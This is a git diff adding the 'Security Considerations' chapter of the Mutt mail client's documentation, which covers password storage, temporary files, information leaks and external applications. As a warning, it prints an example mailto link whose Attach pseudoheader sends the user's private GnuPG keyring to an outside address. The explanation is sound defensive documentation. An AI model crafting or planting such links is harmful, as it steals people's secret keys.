X-Git-Url: https://git.llucax.com/software/mutt-debian.git/blobdiff_plain/19304f7c526fbe36ba0db2fb80bcaf3bd974d81d..24d1372aec0208946117089a703451c458a4c09a:/doc/security.html diff --git a/doc/security.html b/doc/security.html new file mode 100644 index 0000000..918f140 --- /dev/null +++ b/doc/security.html @@ -0,0 +1,90 @@ + + +Chapter 7. Security Considerations

Chapter 7. Security Considerations

Table of Contents

1. Passwords
2. Temporary Files
3. Information Leaks
3.1. Message-Id: headers
3.2. mailto:-style Links
4. External Applications

+First of all, Mutt contains no security holes included by intention but +may contain unknown security holes. As a consequence, please run Mutt +only with as few permissions as possible. Especially, do not run Mutt as +the super user. +

+When configuring Mutt, there're some points to note about secure setups +so please read this chapter carefully. +

1. Passwords

+Although Mutt can be told the various passwords for accounts, please +never store passwords in configuration files. Besides the fact that the +system's operator can always read them, you could forget to mask it out +when reporting a bug or asking for help via a mailing list. Even worse, +your mail including your password could be archived by internet search +engines, mail-to-news gateways etc. It may already be too late before +you notice your mistake. +

2. Temporary Files

+Mutt uses many temporary files for viewing messages, verifying digital +signatures, etc. As long as being used, these files are visible by other +users and maybe even readable in case of misconfiguration. Also, a +different location for these files may be desired which can be changed +via the $tmpdir variable. +

3. Information Leaks

3.1. Message-Id: headers

+Message-Id: headers contain a local part that is to be created in a +unique fashion. In order to do so, Mutt will “leak” some +information to the outside world when sending messages: the generation +of this header includes a step counter which is increased (and rotated) +with every message sent. In a longer running mutt session, others can +make assumptions about your mailing habbits depending on the number of +messages sent. If this is not desired, the header can be manually +provided using $edit_headers (though not +recommended). +

3.2. mailto:-style Links

+As Mutt be can be set up to be the mail client to handle +mailto: style links in websites, there're security +considerations, too. Arbitrary header fields can be embedded in these +links which could override existing header fields or attach arbitrary +files using the Attach: +psuedoheader. This may be problematic if the $edit-headers variable is +unset, i.e. the user doesn't want to see header +fields while editing the message and doesn't pay enough attention to the +compose menu's listing of attachments. +

+For example, following a link like +

+mailto:joe@host?Attach=~/.gnupg/secring.gpg

+will send out the user's private gnupg keyring to +joe@host if the user doesn't follow the information +on screen carefully enough. +

4. External Applications

+Mutt in many places has to rely on external applications or for +convenience supports mechanisms involving external applications. +

+One of these is the mailcap mechanism as defined by +RfC1524. Details about a secure use of the mailcap mechanisms is given +in Section 3.2, “Secure Use of Mailcap”. +

+Besides the mailcap mechanism, Mutt uses a number of other external +utilities for operation, for example to provide crypto support, in +backtick expansion in configuration files or format string filters. The +same security considerations apply for these as for tools involved via +mailcap. +